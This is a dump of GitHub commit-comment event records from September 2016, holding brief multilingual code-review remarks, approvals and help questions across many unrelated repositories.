{"id":"4581134890","type":"CommitCommentEvent","actor":{"login":"wangya2"},"repo":{"name":"AutodeskHome/ServiceLibrary"},"payload":{"comment":{"id":19073266,"position":null,"line":null,"path":null,"commit_id":"1adeea9c7f5060449c70b6708540b1c240ad5d81","created_at":"2016-09-19T02:39:07Z","updated_at":"2016-09-19T02:39:07Z","body":"As far as I can see, your code changes have nothing to do with to do notification. "}},"created_at":"2016-09-19T02:39:07Z"}
{"id":"4581135604","type":"CommitCommentEvent","actor":{"login":"Gavin-YYC"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073269,"position":30,"line":30,"path":"shishuo/view.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T02:39:31Z","updated_at":"2016-09-19T02:39:31Z","body":"这里提示一下~resize事件最好做下降频处理"}},"created_at":"2016-09-19T02:39:31Z"}
{"id":"4581135899","type":"CommitCommentEvent","actor":{"login":"dpgeorge"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19073271,"position":null,"line":null,"path":null,"commit_id":"3fe047f08f12ac922e5486284a2f2254670cd9a9","created_at":"2016-09-19T02:39:40Z","updated_at":"2016-09-19T02:39:40Z","body":"Ok."}},"created_at":"2016-09-19T02:39:40Z"}
{"id":"4581136134","type":"CommitCommentEvent","actor":{"login":"cuongnguyen2503"},"repo":{"name":"phunghv/mesos-framework-demo"},"payload":{"comment":{"id":19073272,"position":null,"line":null,"path":null,"commit_id":"3379af3c2282b0d787a684d2ec42e0581d0135a0","created_at":"2016-09-19T02:39:49Z","updated_at":"2016-09-19T02:39:49Z","body":"![lgtm2](https://cloud.githubusercontent.com/assets/9583215/16071335/fc69869e-3304-11e6-9f38-71fd0acc8965.gif)"}},"created_at":"2016-09-19T02:39:49Z"}
{"id":"4581137941","type":"CommitCommentEvent","actor":{"login":"zhjc1124"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":19073275,"position":null,"line":null,"path":null,"commit_id":"26d56c940e7482a7319a86f9aa17e6ec12e1e3ef","created_at":"2016-09-19T02:40:42Z","updated_at":"2016-09-19T02:40:42Z","body":"我现在不知道为什么都不行了。。。\r\n在电脑上测试可以登录，一放到路由器上就不行\r\n路由器上提示[challenge] timeout, retrying...\r\n然后检查网线也是正常的，交换机上和路由器上的灯都是亮的\r\n想问问到底什么情况会有[challenge] timeout, retrying...的提示\r\n我只试出来网线断了有这个提示"}},"created_at":"2016-09-19T02:40:42Z"}
{"id":"4581138275","type":"CommitCommentEvent","actor":{"login":"Federico-leites"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":19073281,"position":null,"line":null,"path":null,"commit_id":"d4de12682c2a9c704eb6f3a89a94c67bda9ae79f","created_at":"2016-09-19T02:40:50Z","updated_at":"2016-09-19T02:40:50Z","body":"creo que deberia haber agregado la carpeta include a los ignore... en fin. Tengo en error de memory access que seguramente se deba a que no inicialice bien el array doble :( tengo muchas dudas aun de como hacerlo bien.."}},"created_at":"2016-09-19T02:40:50Z"}
{"id":"4581139684","type":"CommitCommentEvent","actor":{"login":"gfsoileau"},"repo":{"name":"annavasilyeva/dsp"},"payload":{"comment":{"id":19073282,"position":null,"line":null,"path":null,"commit_id":"cffd4b84707380b265539ac655c1c217d14fa0c0","created_at":"2016-09-19T02:41:30Z","updated_at":"2016-09-19T02:41:30Z","body":"Hey Anna,\r\nI don't see any of your answers, only print statements. Could you correct and resubmit?\r\n\r\nThanks!"}},"created_at":"2016-09-19T02:41:30Z"}
{"id":"4581140941","type":"CommitCommentEvent","actor":{"login":"cuongnguyen2503"},"repo":{"name":"coderlazy/bet188"},"payload":{"comment":{"id":19073284,"position":null,"line":null,"path":null,"commit_id":"dd6ff420a08279aaacb11e8fcb7db5ebfb8e7324","created_at":"2016-09-19T02:42:02Z","updated_at":"2016-09-19T02:42:02Z","body":"![lgtm2](https://cloud.githubusercontent.com/assets/9583215/16071335/fc69869e-3304-11e6-9f38-71fd0acc8965.gif)"}},"created_at":"2016-09-19T02:42:02Z"}
{"id":"4581142547","type":"CommitCommentEvent","actor":{"login":"andresfib"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":19073285,"position":49,"line":61,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"907475ed899f7f6a5bb29ac69929fb56f9645739","created_at":"2016-09-19T02:42:55Z","updated_at":"2016-09-19T02:42:55Z","body":"It could be nice to settle on some meta comment tag like `// TODO: Remove this and that from server` it will help us to search for those comments and things  to do in the future:)"}},"created_at":"2016-09-19T02:42:55Z"}
{"id":"4581143252","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19073288,"position":null,"line":null,"path":null,"commit_id":"e79c0749e270116d54e4a3759bd75a5fa8374ab7","created_at":"2016-09-19T02:43:14Z","updated_at":"2016-09-19T02:43:14Z","body":"Maybe this one will grow on me, but I think I prefer a squarer look. Maybe `border-radius: 3px` would be ok compromise?"}},"created_at":"2016-09-19T02:43:14Z"}
{"id":"4581143312","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073289,"position":19,"line":72,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslClientBootstrap.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T02:43:15Z","updated_at":"2016-09-19T02:43:15Z","body":"``` SparkSaslClient saslClient =  aesEnable ? new SparkAesSaslClient(appId, secretKeyHolder, encrypt):saslClient = new SparkSaslClient(appId, secretKeyHolder, encrypt);``` or creating a new method to initialize ```saslClient```."}},"created_at":"2016-09-19T02:43:15Z"}
{"id":"4581143972","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073292,"position":22,"line":75,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslClientBootstrap.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T02:43:41Z","updated_at":"2016-09-19T02:43:41Z","body":"If you accept my previous suggestion, you can remove these lines."}},"created_at":"2016-09-19T02:43:41Z"}
{"id":"4581145143","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"rshap91/dsp"},"payload":{"comment":{"id":19073294,"position":null,"line":null,"path":null,"commit_id":"3a6ddcb666e623a816136a88a42c9f8273cc441d","created_at":"2016-09-19T02:44:27Z","updated_at":"2016-09-19T02:44:27Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @rshap91 \r\n\r\nNice work with advanced Python!\r\n\r\n👍 "}},"created_at":"2016-09-19T02:44:27Z"}
{"id":"4581145696","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073295,"position":42,"line":108,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslClientBootstrap.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T02:44:43Z","updated_at":"2016-09-19T02:44:43Z","body":"Not needed breaking line."}},"created_at":"2016-09-19T02:44:43Z"}
{"id":"4581146356","type":"CommitCommentEvent","actor":{"login":"Artoria2e5"},"repo":{"name":"AOSC-Dev/aosc-os-artworks"},"payload":{"comment":{"id":19073297,"position":5,"line":12,"path":"data/core4-plain-timed.xml.in","commit_id":"617b8dddc8d25f6715b9a799bad09da59e20ec97","created_at":"2016-09-19T02:45:06Z","updated_at":"2016-09-19T02:45:06Z","body":"Angry, naive!"}},"created_at":"2016-09-19T02:45:06Z"}
{"id":"4581146391","type":"CommitCommentEvent","actor":{"login":"Amey-Jain"},"repo":{"name":"Amey-Jain/irc-bot"},"payload":{"comment":{"id":19073298,"position":42,"line":35,"path":"bot.py","commit_id":"1e9652606e887efde50763a61fad6ea769e9f7b6","created_at":"2016-09-19T02:45:08Z","updated_at":"2016-09-19T02:45:08Z","body":"Done sir"}},"created_at":"2016-09-19T02:45:08Z"}
{"id":"4581147995","type":"CommitCommentEvent","actor":{"login":"gfsoileau"},"repo":{"name":"davecg/dsp"},"payload":{"comment":{"id":19073299,"position":null,"line":null,"path":null,"commit_id":"41ceee8fed20236497a5ca96d851ed0865cc6a2d","created_at":"2016-09-19T02:46:02Z","updated_at":"2016-09-19T02:46:02Z","body":"Hey David,\r\nExcellent work, you crushed it 👍 Thanks for taking the time to do the bonus exercises. "}},"created_at":"2016-09-19T02:46:02Z"}
{"id":"4581149927","type":"CommitCommentEvent","actor":{"login":"StarryNight678"},"repo":{"name":"StarryNight678/learn"},"payload":{"comment":{"id":19073303,"position":null,"line":null,"path":null,"commit_id":"054a4bd514ce23af3c5273e148467f89ec571f61","created_at":"2016-09-19T02:47:06Z","updated_at":"2016-09-19T02:47:06Z","body":"可以"}},"created_at":"2016-09-19T02:47:06Z"}
{"id":"4581150114","type":"CommitCommentEvent","actor":{"login":"AkiraXue"},"repo":{"name":"AkiraXue/react-native-router-flux"},"payload":{"comment":{"id":19073305,"position":null,"line":null,"path":null,"commit_id":"ca6490ad24e4b4b1737b4b4db6cf889202f01d7a","created_at":"2016-09-19T02:47:11Z","updated_at":"2016-09-19T02:47:11Z","body":"add change commit "}},"created_at":"2016-09-19T02:47:11Z"}
{"id":"4581151067","type":"CommitCommentEvent","actor":{"login":"fdfpy"},"repo":{"name":"fdfpy/e2d3-contrib"},"payload":{"comment":{"id":19073306,"position":null,"line":null,"path":null,"commit_id":"ab29b75b482e5155d23c23b9ad0e4c116435401f","created_at":"2016-09-19T02:47:42Z","updated_at":"2016-09-19T02:47:42Z","body":"aaaa"}},"created_at":"2016-09-19T02:47:42Z"}
{"id":"4581151950","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073308,"position":37,"line":103,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslClientBootstrap.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T02:48:11Z","updated_at":"2016-09-19T02:48:11Z","body":"Add a new debug log here."}},"created_at":"2016-09-19T02:48:11Z"}
{"id":"4581152148","type":"CommitCommentEvent","actor":{"login":"abszolut"},"repo":{"name":"TheThingsNetwork/examples"},"payload":{"comment":{"id":19073309,"position":null,"line":null,"path":null,"commit_id":"83a66f33b0451dd15cde3060fad47ec078ace454","created_at":"2016-09-19T02:48:18Z","updated_at":"2016-09-19T02:48:18Z","body":"I filled the AWS keys and created the thing with devEUI and it says Error: Connection refused: Not authorized.\r\nCould you please tell me why?\r\nThank you"}},"created_at":"2016-09-19T02:48:18Z"}
{"id":"4581154461","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":19073311,"position":4,"line":27,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslRpcHandler.java","commit_id":"730c164e33221af536280e4f5217ce17e01fba0b","created_at":"2016-09-19T02:49:31Z","updated_at":"2016-09-19T02:49:31Z","body":"Wrong place for this dependency."}},"created_at":"2016-09-19T02:49:31Z"}
{"id":"4581154864","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19073313,"position":null,"line":null,"path":null,"commit_id":"03785199fddbaa9c3f9d4392f860cedd2cf72c76","created_at":"2016-09-19T02:49:44Z","updated_at":"2016-09-19T02:49:44Z","body":"Removing the library provided intrinsic functions cleared the way for more organization in `cpu.h`."}},"created_at":"2016-09-19T02:49:44Z"}
{"id":"4581156126","type":"CommitCommentEvent","actor":{"login":"MingcongBai"},"repo":{"name":"AOSC-Dev/aosc-os-artworks"},"payload":{"comment":{"id":19073317,"position":5,"line":12,"path":"data/core4-plain-timed.xml.in","commit_id":"617b8dddc8d25f6715b9a799bad09da59e20ec97","created_at":"2016-09-19T02:50:28Z","updated_at":"2016-09-19T02:50:28Z","body":"LOL"}},"created_at":"2016-09-19T02:50:28Z"}
{"id":"4581156596","type":"CommitCommentEvent","actor":{"login":"zihuaw"},"repo":{"name":"zihuaw/zihuaw.github.io"},"payload":{"comment":{"id":19073319,"position":null,"line":null,"path":null,"commit_id":"1fd7dfd842c7755f35e8d1af636c3808ae319b59","created_at":"2016-09-19T02:50:43Z","updated_at":"2016-09-19T02:50:43Z","body":"Resume"}},"created_at":"2016-09-19T02:50:43Z"}
{"id":"4581157782","type":"CommitCommentEvent","actor":{"login":"dragomano"},"repo":{"name":"l2evy/Storage-Crates"},"payload":{"comment":{"id":19073321,"position":null,"line":null,"path":null,"commit_id":"ce31881d415ce235285a6a64c6a4107c96ce42f9","created_at":"2016-09-19T02:51:24Z","updated_at":"2016-09-19T02:51:24Z","body":"Use \"Bugo\" name, please :)"}},"created_at":"2016-09-19T02:51:24Z"}
{"id":"4581158167","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19073322,"position":null,"line":null,"path":null,"commit_id":"f19e97ad5c0a7bc5e1b11010cfc4d35e91c658e5","created_at":"2016-09-19T02:51:38Z","updated_at":"2016-09-19T02:51:38Z","body":"This was intended for restoring the configuration file in case of `./cryptest.sh compat` or `./cryptest.sh orig`, but it seemed like more hassles than it was worth. If changes are being tested, then we risk whacking the proposed changes."}},"created_at":"2016-09-19T02:51:38Z"}
{"id":"4581158865","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19073323,"position":null,"line":null,"path":null,"commit_id":"ae3342fddcc9983665777bc30d7603bca53d1542","created_at":"2016-09-19T02:52:01Z","updated_at":"2016-09-19T02:52:01Z","body":"House keeping."}},"created_at":"2016-09-19T02:52:01Z"}
{"id":"4581159125","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"rshap91/dsp"},"payload":{"comment":{"id":19073324,"position":null,"line":null,"path":null,"commit_id":"e3bea63dc2fc9ab15212425f74065d785742ed04","created_at":"2016-09-19T02:52:09Z","updated_at":"2016-09-19T02:52:09Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @rshap91 \r\n\r\nYou don't show us the results of your matrix and vector calculations, but the Python code looks correct!"}},"created_at":"2016-09-19T02:52:09Z"}
{"id":"4581159544","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19073325,"position":null,"line":null,"path":null,"commit_id":"c88f09dad846401d6e8b0bd28911e2daa809c1a0","created_at":"2016-09-19T02:52:23Z","updated_at":"2016-09-19T02:52:23Z","body":"Fallout from the CVE."}},"created_at":"2016-09-19T02:52:23Z"}
{"id":"4581159625","type":"CommitCommentEvent","actor":{"login":"acousineau"},"repo":{"name":"mkazmer/AndyStuff"},"payload":{"comment":{"id":19073326,"position":7,"line":11,"path":"TSTstoreTshirtColors.html","commit_id":"42901ef1c9e0c0dfae524c9de03436555e1beffa","created_at":"2016-09-19T02:52:26Z","updated_at":"2016-09-19T02:52:26Z","body":"Cool change brah!"}},"created_at":"2016-09-19T02:52:26Z"}
{"id":"4581162467","type":"CommitCommentEvent","actor":{"login":"awk888"},"repo":{"name":"awk888/awk888.github.io"},"payload":{"comment":{"id":19073331,"position":4,"line":16,"path":"_includes/footer.html","commit_id":"9c9c30a8fd81ff1ab4034792c366b2ac078d217a","created_at":"2016-09-19T02:54:02Z","updated_at":"2016-09-19T02:54:02Z","body":"The icons needed more space between so a `&nbsp;` was needed."}},"created_at":"2016-09-19T02:54:02Z"}
{"id":"4581164500","type":"CommitCommentEvent","actor":{"login":"onewayWang"},"repo":{"name":"onewayWang/MyGitRepository"},"payload":{"comment":{"id":19073338,"position":null,"line":null,"path":null,"commit_id":"dd0eb7f8e2b6921e37039e1e77012f45415c0bb9","created_at":"2016-09-19T02:55:11Z","updated_at":"2016-09-19T02:55:11Z","body":"ok"}},"created_at":"2016-09-19T02:55:11Z"}
{"id":"4581170145","type":"CommitCommentEvent","actor":{"login":"leductin195"},"repo":{"name":"leductin195/hello_world"},"payload":{"comment":{"id":19073348,"position":null,"line":null,"path":null,"commit_id":"bc8755fcf715670f7b378dae2f8e38111a5a193f","created_at":"2016-09-19T02:58:03Z","updated_at":"2016-09-19T02:58:03Z","body":"alo\r\n"}},"created_at":"2016-09-19T02:58:03Z"}
{"id":"4581170816","type":"CommitCommentEvent","actor":{"login":"BlueSky0301"},"repo":{"name":"BlueSky0301/hello-world"},"payload":{"comment":{"id":19073349,"position":null,"line":null,"path":null,"commit_id":"27b237deaaa56b48642ce50927e4cccffc1d53b0","created_at":"2016-09-19T02:58:25Z","updated_at":"2016-09-19T02:58:25Z","body":"approved."}},"created_at":"2016-09-19T02:58:25Z"}
{"id":"4581173048","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19073352,"position":392,"line":392,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T02:59:40Z","updated_at":"2016-09-19T02:59:40Z","body":"顶楼上"}},"created_at":"2016-09-19T02:59:40Z"}
{"id":"4581173053","type":"CommitCommentEvent","actor":{"login":"nelkaim"},"repo":{"name":"nelkaim/test"},"payload":{"comment":{"id":19073353,"position":85,"line":85,"path":"scoreKeeper.java","commit_id":"3115921ea18b1874164f808a7122ec3405c8471b","created_at":"2016-09-19T02:59:40Z","updated_at":"2016-09-19T02:59:40Z","body":"hi"}},"created_at":"2016-09-19T02:59:40Z"}
{"id":"4581173178","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19073354,"position":null,"line":null,"path":null,"commit_id":"2048127309864abe0aee1ce0133a17a0c33965ae","created_at":"2016-09-19T02:59:45Z","updated_at":"2016-09-19T02:59:45Z","body":"@CPSC310Bot "}},"created_at":"2016-09-19T02:59:45Z"}
{"id":"4585563088","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19084680,"position":23,"line":21,"path":"GoIT_Project_1/src/module_5_homework/Controller.java","commit_id":"aac25e2b84e76da1b0ba2d269e0c6ec4bc061b8a","created_at":"2016-09-19T20:00:21Z","updated_at":"2016-09-19T20:00:21Z","body":"Почему 100 ? У тебя есть точное значение. У тебя будет возвращать 100 комнат с null\r\nnull\r\nnull\r\nnull\r\nnull\r\n"}},"created_at":"2016-09-19T20:00:21Z"}
{"id":"4585564794","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":19084693,"position":5,"line":32,"path":"period.rb","commit_id":"5683ff65925990d7820ed3f951723b5f2b84aa02","created_at":"2016-09-19T20:00:34Z","updated_at":"2016-09-19T20:00:34Z","body":":+1: "}},"created_at":"2016-09-19T20:00:34Z"}
{"id":"4585565362","type":"CommitCommentEvent","actor":{"login":"aleclarson"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19084698,"position":526,"line":526,"path":"packager/react-packager/src/node-haste/DependencyGraph/ResolutionRequest.js","commit_id":"667aaa4621a9f59b620cb17b39af8dd309ebd0da","created_at":"2016-09-19T20:00:38Z","updated_at":"2016-09-19T20:00:38Z","body":"@davidaurelio Not sure I understand. You mean `require('...')` is actually a thing?\r\n\r\nI'm just curious why `require('..')` and `require('.')` are not supported.\r\nAre we expected to use the parent dirname instead?\r\n\r\nFor example, to import `parent_dir/index.js` from `parent_dir/sibling.js`:\r\n`require('../parent_dir')` instead of `require('.')`?"}},"created_at":"2016-09-19T20:00:38Z"}
{"id":"4585568881","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084720,"position":60,"line":60,"path":"browser/js/products/products.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:01:12Z","updated_at":"2016-09-19T20:01:12Z","body":"remember to `catch`. Also, does this make sense as a UI-Router `resolve`? If you prefer to fetch in the state, maybe add some kind of loading indication which is turned off once this promise settles?"}},"created_at":"2016-09-19T20:01:12Z"}
{"id":"4585572796","type":"CommitCommentEvent","actor":{"login":"FGDATA"},"repo":{"name":"FGMEMBERS/777"},"payload":{"comment":{"id":19084748,"position":null,"line":null,"path":null,"commit_id":"f4ba04e4c162c045005225470c7f768f169ba5ee","created_at":"2016-09-19T20:01:49Z","updated_at":"2016-09-19T20:01:49Z","body":"VERY VERY PRETTY!!"}},"created_at":"2016-09-19T20:01:49Z"}
{"id":"4585576035","type":"CommitCommentEvent","actor":{"login":"Limited55"},"repo":{"name":"CorpenEldorito/Corps-H5F-Tool"},"payload":{"comment":{"id":19084778,"position":5,"line":30,"path":"H5 FOV and Resoulution Tool/H5_Tool.cs","commit_id":"14fcbc7fd39857fde90390bb655897f8f3655664","created_at":"2016-09-19T20:02:24Z","updated_at":"2016-09-19T20:02:24Z","body":"Uh, what? Notepad?"}},"created_at":"2016-09-19T20:02:24Z"}
{"id":"4585576376","type":"CommitCommentEvent","actor":{"login":"waltervn"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19084781,"position":9,"line":384,"path":"engines/sci/sound/midiparser_sci.cpp","commit_id":"ed05ffea4b765016899bfd4c5db21347bf614e2d","created_at":"2016-09-19T20:02:28Z","updated_at":"2016-09-19T20:02:28Z","body":"Can this be moved to the beginning of the \"_soundVersion <= SCI_VERSION_0_LATE\" block ealier in the function?"}},"created_at":"2016-09-19T20:02:28Z"}
{"id":"4585578756","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":19084791,"position":6,"line":33,"path":"theatre.rb","commit_id":"5683ff65925990d7820ed3f951723b5f2b84aa02","created_at":"2016-09-19T20:02:43Z","updated_at":"2016-09-19T20:02:43Z","body":"тут можно аккуратнее. сильно аккуратнее, будем честны!"}},"created_at":"2016-09-19T20:02:43Z"}
{"id":"4585579046","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19084792,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-19T20:02:46Z","updated_at":"2016-09-19T20:02:46Z","body":"i would agree with edits of system/core.\r\n\r\nhmmm...i am now building (50%) and i will check whats going on.also video recording needs some edits.i need log to work on it so that i build...\r\n\r\n"}},"created_at":"2016-09-19T20:02:46Z"}
{"id":"4585579739","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084796,"position":55,"line":55,"path":"browser/js/products/products.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:02:52Z","updated_at":"2016-09-19T20:02:52Z","body":"Why do you have a controller that is shared between all products and one product? It's almost never a good idea to reuse the same controller for two different views as you end up with weird if-else logic. However if the intent is to show show all products on a single product page this is maybe ok…"}},"created_at":"2016-09-19T20:02:52Z"}
{"id":"4585580832","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084806,"position":55,"line":55,"path":"browser/js/products/products.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:03:05Z","updated_at":"2016-09-19T20:03:05Z","body":"Also `catch`."}},"created_at":"2016-09-19T20:03:05Z"}
{"id":"4585589630","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084822,"position":64,"line":64,"path":"browser/js/products/products.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:04:44Z","updated_at":"2016-09-19T20:04:44Z","body":"You'd call something like `CartFactory.addToCart`, which would handle the more complex logic coordinating `localStorage` and other implementation details."}},"created_at":"2016-09-19T20:04:44Z"}
{"id":"4585598595","type":"CommitCommentEvent","actor":{"login":"renannetto"},"repo":{"name":"eclufsc/ophidian"},"payload":{"comment":{"id":19084849,"position":82,"line":82,"path":"test/geometry/models_test.cpp","commit_id":"442e60f7ed36ada21848c9ab1925aeba0c586c7e","created_at":"2016-09-19T20:06:26Z","updated_at":"2016-09-19T20:06:26Z","body":"Anyway, I'll change the tests to use ophidian::geometry::make, to make it clear that it works for different geometries."}},"created_at":"2016-09-19T20:06:26Z"}
{"id":"4585599429","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084851,"position":20,"line":20,"path":"browser/js/products/products.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:06:35Z","updated_at":"2016-09-19T20:06:35Z","body":"might want to centralize logic with a `localStorage` factory."}},"created_at":"2016-09-19T20:06:35Z"}
{"id":"4585601136","type":"CommitCommentEvent","actor":{"login":"zdroid"},"repo":{"name":"bevry/projectz"},"payload":{"comment":{"id":19084858,"position":null,"line":null,"path":null,"commit_id":"6c7b711fac2eeacfb219212adeea69c2f10dcba9","created_at":"2016-09-19T20:06:53Z","updated_at":"2016-09-19T20:06:53Z","body":":ship: :it:\r\n\r\nLooks alright to me."}},"created_at":"2016-09-19T20:06:53Z"}
{"id":"4585601368","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19084860,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-19T20:06:56Z","updated_at":"2016-09-19T20:06:56Z","body":"The commit on core repo is from AOSP, they merged it on N (it was there even in the first preview if i remember well) "}},"created_at":"2016-09-19T20:06:56Z"}
{"id":"4585602029","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19084862,"position":null,"line":null,"path":null,"commit_id":"d870b343701f3d56738e015973489e1e9b4a6585","created_at":"2016-09-19T20:07:04Z","updated_at":"2016-09-19T20:07:04Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2294 of 2474 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d870b343701f3d56738e015973489e1e9b4a6585-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d870b343701f3d56738e015973489e1e9b4a6585-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.72%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T20:07:04Z"}
{"id":"4585602137","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084864,"position":23,"line":23,"path":"browser/js/products/products.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:07:05Z","updated_at":"2016-09-19T20:07:05Z","body":"Alert… :-P\r\n\r\nBetter ways of doing modals. ;-)"}},"created_at":"2016-09-19T20:07:05Z"}
{"id":"4585604804","type":"CommitCommentEvent","actor":{"login":"DrRamm"},"repo":{"name":"bliss-cancro/android_device_xiaomi_cancro"},"payload":{"comment":{"id":19084871,"position":null,"line":null,"path":null,"commit_id":"d4b06328edc4b97d46b1828f0b14c4b87242221d","created_at":"2016-09-19T20:07:33Z","updated_at":"2016-09-19T20:07:33Z","body":"EV Range = Exposure Compensation × Step size \r\nSo -12 × 0.166667 you get - 2.0\r\nSo -6 = 1.0 ev\r\n 0.166667 is the default Qualcomm step size for ev"}},"created_at":"2016-09-19T20:07:33Z"}
{"id":"4585610027","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084887,"position":40,"line":40,"path":"browser/js/products/products.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:08:31Z","updated_at":"2016-09-19T20:08:31Z","body":"This assumes there is a `Session.user`. Might want to have a more defensive implementation."}},"created_at":"2016-09-19T20:08:31Z"}
{"id":"4585612995","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084895,"position":9,"line":9,"path":"browser/js/products/products.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:09:05Z","updated_at":"2016-09-19T20:09:05Z","body":"This factory mixes concerns; you have both products API logic and local cart logic."}},"created_at":"2016-09-19T20:09:05Z"}
{"id":"4585613130","type":"CommitCommentEvent","actor":{"login":"byTurker"},"repo":{"name":"byTurker/MyProjects"},"payload":{"comment":{"id":19084896,"position":null,"line":null,"path":null,"commit_id":"9b81a0624123262b03ce97817058f49521a6d8fe","created_at":"2016-09-19T20:09:06Z","updated_at":"2016-09-19T20:09:06Z","body":"first commit"}},"created_at":"2016-09-19T20:09:06Z"}
